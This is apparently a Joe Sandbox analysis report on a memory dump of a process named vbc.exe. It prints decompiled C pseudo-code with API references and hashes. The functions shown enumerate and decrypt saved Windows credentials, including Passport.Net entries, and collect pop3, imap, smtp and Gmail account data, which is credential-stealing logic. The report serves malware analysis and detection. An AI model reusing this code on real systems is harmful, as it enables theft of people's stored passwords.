					_v20 = _v20 + 1;
				} while (_v20 < _t66);
				goto L10;
			}




























                                                                                                                                                    0x004055ab
                                                                                                                                                    0x004055b6
                                                                                                                                                    0x004055cc
                                                                                                                                                    0x004055cf
                                                                                                                                                    0x004055dc
                                                                                                                                                    0x004055de
                                                                                                                                                    0x004055ea
                                                                                                                                                    0x004055ee
                                                                                                                                                    0x004055f3
                                                                                                                                                    0x004055f4
                                                                                                                                                    0x004055f5
                                                                                                                                                    0x004055ff
                                                                                                                                                    0x00405600
                                                                                                                                                    0x00405605
                                                                                                                                                    0x00405608
                                                                                                                                                    0x0040560d
                                                                                                                                                    0x00405612
                                                                                                                                                    0x00405615
                                                                                                                                                    0x00405618
                                                                                                                                                    0x0040561b
                                                                                                                                                    0x004056f5
                                                                                                                                                    0x004056f7
                                                                                                                                                    0x004056fd
                                                                                                                                                    0x00405712
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405621
                                                                                                                                                    0x00405621
                                                                                                                                                    0x00405621
                                                                                                                                                    0x00405624
                                                                                                                                                    0x00405627
                                                                                                                                                    0x0040562d
                                                                                                                                                    0x00405638
                                                                                                                                                    0x0040564c
                                                                                                                                                    0x00405652
                                                                                                                                                    0x00405660
                                                                                                                                                    0x00405669
                                                                                                                                                    0x00405673
                                                                                                                                                    0x00405680
                                                                                                                                                    0x0040568b
                                                                                                                                                    0x0040568d
                                                                                                                                                    0x00405696
                                                                                                                                                    0x00405697
                                                                                                                                                    0x0040569c
                                                                                                                                                    0x0040569d
                                                                                                                                                    0x004056a5
                                                                                                                                                    0x004056a7
                                                                                                                                                    0x004056b9
                                                                                                                                                    0x004056be
                                                                                                                                                    0x004056c3
                                                                                                                                                    0x004056d3
                                                                                                                                                    0x004056d3
                                                                                                                                                    0x004056c3
                                                                                                                                                    0x0040568b
                                                                                                                                                    0x004056d6
                                                                                                                                                    0x004056d9
                                                                                                                                                    0x004056dc
                                                                                                                                                    0x004056e0
                                                                                                                                                    0x004056e9
                                                                                                                                                    0x004056ec
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                    • Opcode ID: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                                                                                    • Instruction ID: c9ec69d2b7f122f2474fbd4df523f5fea2365e5f162f49a3354b930d279265bd
                                                                                                                                                    • Opcode Fuzzy Hash: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                                                                                    • Instruction Fuzzy Hash: 304126B5D00109AFDB209F99DC81DAEBBB9FF04348F00846AE918B7291D7759E50CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D5DB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                    			E0040D5DB(char* __ebx, void* __eflags) {
				char _v8;
				short* _v12;
				int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				int _v56;
				char _v60;
				char _v584;
				void* __edi;
				void* __esi;
				void* _t36;
				intOrPtr _t44;
				void* _t47;
				char _t63;
				int _t69;
				void* _t74;

				_t74 = __eflags;
				_t69 = 0;
				E004046D7( &_v584);
				_v60 = 0;
				_v56 = 0;
				_t36 = E00404647( &_v60, 0, _t74);
				_t75 = _t36;
				if(_t36 != 0 && E004047A0( &_v584, _t75) != 0) {
					_push( &_v8);
					_push(0);
					_push(4);
					_push("Passport.Net\\*");
					if(_v52() != 0) {
						_t44 = _v8;
						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
							_v32 =  *((intOrPtr*)(_t44 + 0x18));
							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
							_t47 = 0;
							_t63 = 0x4a;
							do {
								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
								 *(_t47 + 0x417768) =  *_t14 << 2;
								_t47 = _t47 + 2;
							} while (_t47 < _t63);
							_v24 = _t63;
							_v20 = 0x417768;
							if(E00404811( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
									strcpy(__ebx,  *(_v8 + 0x30));
									_t69 = 1;
								}
								LocalFree(_v12);
							}
							_t44 = _v8;
						}
						_v48(_t44);
					}
				}
				E004046C2( &_v60);
				E004047F1( &_v584);
				return _t69;
			}























                                                                                                                                                    0x0040d5db
                                                                                                                                                    0x0040d5ec
                                                                                                                                                    0x0040d5ee
                                                                                                                                                    0x0040d5f6
                                                                                                                                                    0x0040d5f9
                                                                                                                                                    0x0040d5fc
                                                                                                                                                    0x0040d601
                                                                                                                                                    0x0040d603
                                                                                                                                                    0x0040d619
                                                                                                                                                    0x0040d61a
                                                                                                                                                    0x0040d61b
                                                                                                                                                    0x0040d61d
                                                                                                                                                    0x0040d627
                                                                                                                                                    0x0040d62d
                                                                                                                                                    0x0040d633
                                                                                                                                                    0x0040d645
                                                                                                                                                    0x0040d64d
                                                                                                                                                    0x0040d650
                                                                                                                                                    0x0040d652
                                                                                                                                                    0x0040d653
                                                                                                                                                    0x0040d653
                                                                                                                                                    0x0040d65e
                                                                                                                                                    0x0040d666
                                                                                                                                                    0x0040d667
                                                                                                                                                    0x0040d67d
                                                                                                                                                    0x0040d680
                                                                                                                                                    0x0040d68e
                                                                                                                                                    0x0040d6af
                                                                                                                                                    0x0040d6c8
                                                                                                                                                    0x0040d6d1
                                                                                                                                                    0x0040d6d1
                                                                                                                                                    0x0040d6d5
                                                                                                                                                    0x0040d6d5
                                                                                                                                                    0x0040d6db
                                                                                                                                                    0x0040d6db
                                                                                                                                                    0x0040d6df
                                                                                                                                                    0x0040d6df
                                                                                                                                                    0x0040d627
                                                                                                                                                    0x0040d6e5
                                                                                                                                                    0x0040d6f0
                                                                                                                                                    0x0040d6fa

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                                                                      • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7554F420), ref: 00404654
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                                                                                      • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                                                                                    • strlen.MSVCRT ref: 0040D6B7
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                    • String ID: Passport.Net\*$hwA
                                                                                                                                                    • API String ID: 3335197805-2625321100
                                                                                                                                                    • Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                                                                                    • Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
                                                                                                                                                    • Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                                                                                    • Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407EFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 41%
                                                                                                                                                    			E00407EFB(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
				int _v0;
				int _t26;
				char* _t32;
				int _t44;
				signed int _t46;
				signed int _t47;

				_t38 = __ecx;
				_t47 = _t46 & 0xfffffff8;
				E004118A0(0x1040, __ecx);
				_t26 = GetMenuItemCount(_a8);
				_t44 = 0;
				_v0 = _t26;
				if(_t26 <= 0) {
					L13:
					return _t26;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a53, 0, 0x1000);
					_t47 = _t47 + 0xc;
					_a40 =  &_a52;
					_a4.cbSize = 0x30;
					_a8 = 0x36;
					_a44 = 0x1000;
					_a20 = 0;
					_a52 = 0;
					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);
					if(_t26 == 0) {
						goto L12;
					}
					if(_a52 == 0) {
						L10:
						_t55 = _a24;
						if(_a24 != 0) {
							_push(0);
							_push(_a24);
							_push(_a4.cbSize);
							_t26 = E00407EFB(_t38, _t55);
							_t47 = _t47 + 0xc;
						}
						goto L12;
					}
					_t32 = strchr( &_a52, 9);
					if(_t32 != 0) {
						 *_t32 = 0;
					}
					_t33 = _a20;
					if(_a24 != 0) {
						if(_a12 == 0) {
							 *0x4171b4 =  *0x4171b4 + 1;
							_t33 =  *0x4171b4 + 0x11558;
							__eflags =  *0x4171b4 + 0x11558;
						} else {
							_t18 = _t44 + 0x11171; // 0x11171
							_t33 = _t18;
						}
					}
					_t26 = E00407EC3(_t33,  &_a52);
					_pop(_t38);
					goto L10;
					L12:
					_t44 = _t44 + 1;
				} while (_t44 < _v0);
				goto L13;
			}









                                                                                                                                                    0x00407efb
                                                                                                                                                    0x00407efe
                                                                                                                                                    0x00407f06
                                                                                                                                                    0x00407f10
                                                                                                                                                    0x00407f18
                                                                                                                                                    0x00407f1c
                                                                                                                                                    0x00407f20
                                                                                                                                                    0x00407fe5
                                                                                                                                                    0x00407fea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407f26
                                                                                                                                                    0x00407f26
                                                                                                                                                    0x00407f31
                                                                                                                                                    0x00407f36
                                                                                                                                                    0x00407f3d
                                                                                                                                                    0x00407f4c
                                                                                                                                                    0x00407f54
                                                                                                                                                    0x00407f5c
                                                                                                                                                    0x00407f64
                                                                                                                                                    0x00407f68
                                                                                                                                                    0x00407f6c
                                                                                                                                                    0x00407f74
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407f7a
                                                                                                                                                    0x00407fc4
                                                                                                                                                    0x00407fc4
                                                                                                                                                    0x00407fc8
                                                                                                                                                    0x00407fca
                                                                                                                                                    0x00407fcb
                                                                                                                                                    0x00407fcf
                                                                                                                                                    0x00407fd2
                                                                                                                                                    0x00407fd7
                                                                                                                                                    0x00407fd7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407fc8
                                                                                                                                                    0x00407f83
                                                                                                                                                    0x00407f8c
                                                                                                                                                    0x00407f8e
                                                                                                                                                    0x00407f8e
                                                                                                                                                    0x00407f94
                                                                                                                                                    0x00407f98
                                                                                                                                                    0x00407f9d
                                                                                                                                                    0x00407fa7
                                                                                                                                                    0x00407fb2
                                                                                                                                                    0x00407fb2
                                                                                                                                                    0x00407f9f
                                                                                                                                                    0x00407f9f
                                                                                                                                                    0x00407f9f
                                                                                                                                                    0x00407f9f
                                                                                                                                                    0x00407f9d
                                                                                                                                                    0x00407fbd
                                                                                                                                                    0x00407fc3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00407fda
                                                                                                                                                    0x00407fda
                                                                                                                                                    0x00407fdb
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                    • String ID: 0$6
                                                                                                                                                    • API String ID: 2300387033-3849865405
                                                                                                                                                    • Opcode ID: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                                                                                    • Instruction ID: e6a74f55cf859b5146a282672b091174d688b167a10cd96a0b5acbf0203f559b
                                                                                                                                                    • Opcode Fuzzy Hash: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                                                                                    • Instruction Fuzzy Hash: B821917190C381AFD7109F21D88199BBBE8FB84348F44897FF68496290E779E944CB5B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004044DA Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                    			E004044DA(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t44;
				intOrPtr _t50;
				void* _t56;
				intOrPtr _t58;
				void* _t63;

				_t63 = __fp0;
				_t50 = __ecx;
				_v8 = __ecx;
				E004021D8( &_v940);
				_t58 = _a4;
				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
				_push(_t58 + 0x404);
				_t44 = 0x7f;
				E004060D0(_t44,  &_v796);
				E004060D0(_t44,  &_v408, _t58 + 0x204);
				E004060D0(_t44,  &_v928, _t58 + 4);
				E004060D0(_t44,  &_v668, _t58 + 0x104);
				_t37 = E004060D0(_t44,  &_v280, _t58 + 0x304);
				_t56 = _t58 + 0x504;
				_push("pop3");
				_push(_t56);
				L004115B2();
				if(_t37 != 0) {
					_push("imap");
					_push(_t56);
					L004115B2();
					if(_t37 != 0) {
						_push("smtp");
						_push(_t56);
						L004115B2();
						if(_t37 == 0) {
							_v412 = 4;
						}
					} else {
						_v412 = 2;
					}
				} else {
					_v412 = 1;
				}
				_v24 =  *((intOrPtr*)(_t58 + 0x804));
				_v20 =  *((intOrPtr*)(_t58 + 0x808));
				return E00402407( &_v940, _t63, _v8 + 0xfffffe38);
			}























                                                                                                                                                    0x004044da
                                                                                                                                                    0x004044e6
                                                                                                                                                    0x004044ee
                                                                                                                                                    0x004044f1
                                                                                                                                                    0x004044fc
                                                                                                                                                    0x004044ff
                                                                                                                                                    0x0040450b
                                                                                                                                                    0x0040450e
                                                                                                                                                    0x00404515
                                                                                                                                                    0x00404527
                                                                                                                                                    0x00404536
                                                                                                                                                    0x00404548
                                                                                                                                                    0x0040455a
                                                                                                                                                    0x0040455f
                                                                                                                                                    0x00404565
                                                                                                                                                    0x0040456a
                                                                                                                                                    0x0040456b
                                                                                                                                                    0x00404575
                                                                                                                                                    0x00404583
                                                                                                                                                    0x00404588
                                                                                                                                                    0x00404589
                                                                                                                                                    0x00404592
                                                                                                                                                    0x004045a0
                                                                                                                                                    0x004045a5
                                                                                                                                                    0x004045a6
                                                                                                                                                    0x004045af
                                                                                                                                                    0x004045b1
                                                                                                                                                    0x004045b1
                                                                                                                                                    0x00404594
                                                                                                                                                    0x00404594
                                                                                                                                                    0x00404594
                                                                                                                                                    0x00404577
                                                                                                                                                    0x00404577
                                                                                                                                                    0x00404577
                                                                                                                                                    0x004045c1
                                                                                                                                                    0x004045ca
                                                                                                                                                    0x004045e5

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                                                                      • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                                                                                    • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
                                                                                                                                                    • _stricmp.MSVCRT(?,imap), ref: 00404589
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _stricmp$memcpystrlen
                                                                                                                                                    • String ID: imap$pop3$smtp
                                                                                                                                                    • API String ID: 445763297-821077329
                                                                                                                                                    • Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                                                                                    • Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
                                                                                                                                                    • Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                                                                                    • Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004036CC Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004036CC(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v5;
				char _v132;
				char _v404;
				char _v532;
				intOrPtr _v536;
				char _v920;
				intOrPtr _v924;
				char _v1052;
				char _v1064;
				void* __ebx;
				void* _t18;
				char* _t20;
				char* _t39;
				char* _t41;
				void* _t48;
				void* _t59;

				_t59 = __fp0;
				_t48 = __edi;
				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
					return _t18;
				}
				_t39 =  &_v132;
				_t20 = E0040E906(_t39, __edi + 0x87c, _a4);
				if(_t20 != 0) {
					_v5 = 0;
					_t20 = strchr(_t39, 0x3a);
					_t41 = _t20;
					if(_t41 != 0) {
						 *_t41 = 0;
						E004021D8( &_v1064);
						strcpy( &_v404,  &(_t41[1]));
						strcpy( &_v532,  &_v132);
						_v924 = 7;
						_v536 = 3;
						if(strlen( &_v532) + 0xa < 0x7f) {
							sprintf( &_v920, "%s@gmail.com",  &_v532);
						}
						strcpy( &_v1052,  &_v532);
						_t20 = E00402407( &_v1064, _t59, _t48);
					}
				}
				return _t20;
			}



















                                                                                                                                                    0x004036cc
                                                                                                                                                    0x004036cc
                                                                                                                                                    0x004036dc
                                                                                                                                                    0x004037ae
                                                                                                                                                    0x004037ae
                                                                                                                                                    0x004036ed
                                                                                                                                                    0x004036f0
                                                                                                                                                    0x004036f7
                                                                                                                                                    0x00403702
                                                                                                                                                    0x00403706
                                                                                                                                                    0x0040370b
                                                                                                                                                    0x00403711
                                                                                                                                                    0x0040371e
                                                                                                                                                    0x00403721
                                                                                                                                                    0x0040372f
                                                                                                                                                    0x0040373f
                                                                                                                                                    0x0040374b
                                                                                                                                                    0x00403755
                                                                                                                                                    0x0040376e
                                                                                                                                                    0x00403783
                                                                                                                                                    0x00403788
                                                                                                                                                    0x00403799
                                                                                                                                                    0x004037a7
                                                                                                                                                    0x004037a7
                                                                                                                                                    0x00403711
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                                                                                      • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                                                                                      • Part of subcall function 0040E906: memcpy.MSVCRT ref: 0040E966
                                                                                                                                                      • Part of subcall function 0040E906: CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                                                                                    • strchr.MSVCRT ref: 00403706
                                                                                                                                                    • strcpy.MSVCRT(?,00000001,?,?,?), ref: 0040372F
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 0040373F
                                                                                                                                                    • strlen.MSVCRT ref: 0040375F
                                                                                                                                                    • sprintf.MSVCRT ref: 00403783
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 00403799
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                    • String ID: %s@gmail.com
                                                                                                                                                    • API String ID: 2649369358-4097000612
                                                                                                                                                    • Opcode ID: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                                                                                                    • Instruction ID: 7e171057c748ab9e8bd63aa8a265ef6dac548e8f33c4ed25ddb9a168741e2a8b
                                                                                                                                                    • Opcode Fuzzy Hash: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                                                                                                    • Instruction Fuzzy Hash: B221ABF294411C6EDB11DB55DC85FDA77ACAB54308F4004BBE609E2081EA789BC48B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040684D Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040684D(char* __ebx, intOrPtr _a4, int _a8) {
				char _v8;
				void _v1031;
				void _v1032;
				void* _t26;
				char* _t27;
				int _t32;
				int _t38;
				char* _t43;
				int _t44;
				void* _t45;
				void** _t48;
				void* _t50;
				void* _t51;

				_t43 = __ebx;
				_t44 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				_t26 = _a8;
				_t51 = _t50 + 0xc;
				 *__ebx = 0;
				if(_t26 > 0) {
					_t48 = _a4 + 4;
					_v8 = _t26;
					do {
						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
						_t32 = strlen( &_v1032);
						_a8 = _t32;
						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
						_t45 = _t44 + _a8 + 1;
						_t38 = strlen( *_t48);
						_a8 = _t38;
						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
						_t51 = _t51 + 0x30;
						_t48 =  &(_t48[2]);
						_t18 =  &_v8;
						 *_t18 = _v8 - 1;
						_t44 = _t45 + _a8 + 1;
					} while ( *_t18 != 0);
				}
				_t27 = _t44 + _t43;
				 *_t27 = 0;
				 *((char*)(_t27 + 1)) = 0;
				return _t43;
			}
















                                                                                                                                                    0x0040684d
                                                                                                                                                    0x0040685c
                                                                                                                                                    0x00406866
                                                                                                                                                    0x0040686d
                                                                                                                                                    0x00406872
                                                                                                                                                    0x00406875
                                                                                                                                                    0x0040687a
                                                                                                                                                    0x0040687d
                                                                                                                                                    0x00406883
                                                                                                                                                    0x00406886
                                                                                                                                                    0x00406889
                                                                                                                                                    0x0040689a
                                                                                                                                                    0x004068a6
                                                                                                                                                    0x004068ab
                                                                                                                                                    0x004068bb
                                                                                                                                                    0x004068c5
                                                                                                                                                    0x004068c9
                                                                                                                                                    0x004068ce
                                                                                                                                                    0x004068d9
                                                                                                                                                    0x004068e1
                                                                                                                                                    0x004068e4
                                                                                                                                                    0x004068e7
                                                                                                                                                    0x004068e7
                                                                                                                                                    0x004068ea
                                                                                                                                                    0x004068ea
                                                                                                                                                    0x004068f0
                                                                                                                                                    0x004068f1
                                                                                                                                                    0x004068f4
                                                                                                                                                    0x004068f7
                                                                                                                                                    0x004068ff

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                    • String ID: %s (%s)
                                                                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                                                                    • Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                                                                                    • Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
                                                                                                                                                    • Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                                                                                    • Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E906 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                    			E0040E906(void* __ebx, int _a4, void* _a8) {
				char _v20;
				char _v36;
				char _v52;
				void* _t15;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				int _t32;

				_t28 = __ebx;
				_t31 = __imp__UuidFromStringA;
				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
				if(_t15 != 0 || _t17 != 0 || E0040E8CA( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
					return 0;
				} else {
					_t32 = _a4;
					if(_t32 > 0x7e) {
						_t32 = 0x7e;
					}
					memcpy(_t28, _a8, _t32);
					 *((char*)(_t28 + _t32)) = 0;
					__imp__CoTaskMemFree(_a8);
					return 1;
				}
			}











                                                                                                                                                    0x0040e906
                                                                                                                                                    0x0040e90d
                                                                                                                                                    0x0040e91d
                                                                                                                                                    0x0040e92a
                                                                                                                                                    0x0040e92e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e956
                                                                                                                                                    0x0040e956
                                                                                                                                                    0x0040e95c
                                                                                                                                                    0x0040e960
                                                                                                                                                    0x0040e960
                                                                                                                                                    0x0040e966
                                                                                                                                                    0x0040e971
                                                                                                                                                    0x0040e975
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040e97d

                                                                                                                                                    APIs
                                                                                                                                                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                                                                                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                                                                                    • memcpy.MSVCRT ref: 0040E966
                                                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                                                                                    Strings
